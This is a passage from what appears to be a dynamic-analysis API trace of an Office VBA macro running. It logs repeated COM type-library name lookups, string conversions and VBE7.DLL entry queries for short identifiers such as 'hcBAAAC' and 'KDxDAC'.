wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f72, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hcBAAAC") returned 8 [0069.501] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hcBAAAC", lHashVal=0x10f9c1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.501] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hcBAAAC") returned 0x10f9c1 [0069.501] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="hcBAAAC" | out: _Dst="hcBAAAC") returned 0x0 [0069.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="hcBAAAC") returned 8 [0069.501] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.501] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hcBAAAC", lHashVal=0x10f9c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.501] IUnknown:Release (This=0x665ba50) returned 0xd [0069.501] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.501] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hcBAAAC", lHashVal=0x10f9c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.501] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.501] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.501] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hcBAAAC", lHashVal=0x10f9c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.501] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.501] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.501] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hcBAAAC", lHashVal=0x10f9c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.501] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f72, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hcBAAAC") returned 8 [0069.502] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hcBAAAC", lHashVal=0x10f9c1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.502] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.502] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80f72 | out: _Dst=0x67c2d40) returned 0x0 [0069.502] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hcBAAAC") returned 0x10fd45 [0069.502] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_hcBAAAC" | out: _Dst="_B_var_hcBAAAC") returned 0x0 [0069.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_hcBAAAC") returned 15 [0069.502] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.502] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hcBAAAC", lHashVal=0x10fd45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.502] IUnknown:Release (This=0x665ba50) returned 0xd [0069.502] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.502] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hcBAAAC", lHashVal=0x10fd45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.502] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.502] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.502] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hcBAAAC", lHashVal=0x10fd45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.502] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.502] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.502] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hcBAAAC", lHashVal=0x10fd45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.502] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.502] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.502] IUnknown:Release (This=0x665ba50) returned 0xd [0069.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87010e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_hcBAAAC") returned 15 [0069.503] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hcBAAAC", lHashVal=0x10fd45, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.503] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80f72 | out: _Dst=0x144ec0) returned 0x0 [0069.503] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KDxDAC", lHashVal=0x10c1b0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80fc2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KDxDAC") returned 7 [0069.503] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KDxDAC", lHashVal=0x10c1b0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80fc2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KDxDAC") returned 7 [0069.503] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KDxDAC", lHashVal=0x10c1b0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDxDAC") returned 0x10c1b0 [0069.503] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="KDxDAC" | out: _Dst="KDxDAC") returned 0x0 [0069.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="KDxDAC") returned 7 [0069.503] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.503] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KDxDAC", lHashVal=0x10c1b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.503] IUnknown:Release (This=0x665ba50) returned 0xd [0069.503] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.503] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KDxDAC", lHashVal=0x10c1b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.503] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.503] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.503] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KDxDAC", lHashVal=0x10c1b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.503] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.504] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.504] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KDxDAC", lHashVal=0x10c1b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.504] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80fc2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KDxDAC") returned 7 [0069.504] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KDxDAC", lHashVal=0x10c1b0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.504] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.504] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80fc2 | out: _Dst=0x67c2d40) returned 0x0 [0069.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KDxDAC") returned 0x103c1a [0069.504] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_KDxDAC" | out: _Dst="_B_var_KDxDAC") returned 0x0 [0069.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_KDxDAC") returned 14 [0069.504] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.504] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KDxDAC", lHashVal=0x103c1a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.504] IUnknown:Release (This=0x665ba50) returned 0xd [0069.504] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.504] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KDxDAC", lHashVal=0x103c1a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.504] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.504] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.504] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KDxDAC", lHashVal=0x103c1a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.504] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.504] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.504] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KDxDAC", lHashVal=0x103c1a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.504] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.504] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.504] IUnknown:Release (This=0x665ba50) returned 0xd [0069.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87013e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_KDxDAC") returned 14 [0069.504] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KDxDAC", lHashVal=0x103c1a, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.505] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80fc2 | out: _Dst=0x144ec0) returned 0x0 [0069.505] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.505] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.505] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.505] IUnknown:Release (This=0x665ba50) returned 0xd [0069.505] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.505] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.505] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.505] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.506] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.506] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.506] IUnknown:Release (This=0x665ba50) returned 0xd [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.506] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.506] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.506] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.506] IUnknown:Release (This=0x665ba50) returned 0xd [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.506] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.506] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.506] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.506] IUnknown:Release (This=0x665ba50) returned 0xd [0069.506] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.507] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.507] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.507] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.507] IUnknown:Release (This=0x665ba50) returned 0xd [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.507] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.507] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.507] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.507] IUnknown:Release (This=0x665ba50) returned 0xd [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.507] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.508] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.508] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.508] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.508] IUnknown:Release (This=0x665ba50) returned 0xd [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.508] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.508] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.508] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.508] IUnknown:Release (This=0x665ba50) returned 0xd [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.508] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.508] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, 